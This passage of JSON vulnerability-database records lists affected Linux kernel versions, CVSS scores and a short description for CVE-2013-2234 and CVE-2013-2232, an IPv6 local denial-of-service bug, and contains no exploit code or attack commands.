"cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.6.4", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.6.2", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.6.8", "cpe:/o:linux:linux_kernel:3.8.2", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.4.11"], "id": "CVE-2013-2234", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2234", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.9:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.0.53:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.68:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.37:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.8.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.47:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.39:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.2.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.43:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.44:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.59:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.2.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.62:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.45:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.66:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.0.54:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.49:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.64:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.42:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.51:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.61:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.6.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.6.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.55:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.57:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.31:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.36:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.40:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.60:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.1.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.0.41:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.56:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.34:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.48:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.35:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.50:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.32:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.33:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.63:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.29:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.52:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.30:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.46:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.65:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc2:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.58:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.3.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.7.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc1:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.38:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.8.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4:rc3:*:*:*:*:x86:*", "cpe:2.3:o:linux:linux_kernel:3.2.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.67:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.9:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.2.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:3.0:rc7:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:06:50", "description": "The ip6_sk_dst_check function in net/ipv6/ip6_output.c in the Linux kernel before 3.10 allows local users to cause a denial of service (system crash) by using an AF_INET6 socket for a connection to an IPv4 interface.", "edition": 6, "cvss3": {}, "published": "2013-07-04T21:55:00", "title": "CVE-2013-2232", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2232"], "modified": "2014-02-07T04:46:00", "cpe": ["cpe:/o:linux:linux_kernel:3.0.57", "cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.9", "cpe:/o:linux:linux_kernel:3.4.30", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.0.64", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.4.27", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.8.4", "cpe:/o:linux:linux_kernel:3.0.61", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.0.47", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.6.5", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.6", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.6.3", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.0.67", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.45", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.0.49", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.0.59", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.8.3", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.0.50", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.8.5", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.9.5", "cpe:/o:linux:linux_kernel:3.6.1", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.0.63", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.9.1", "cpe:/o:linux:linux_kernel:3.0.56", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.0.58", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.0.66", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.0.60", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.4.32", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.0.65", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.0.62", "cpe:/o:linux:linux_kernel:3.0.55", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.9.3", "cpe:/o:linux:linux_kernel:3.0.46", "cpe:/o:linux:linux_kernel:3.6.6", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.9.9", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.4.26", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.8.1", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.68", "cpe:/o:linux:linux_kernel:3.8.7", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.0", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.7.10", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.4.29", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.8.8", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0.53", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", 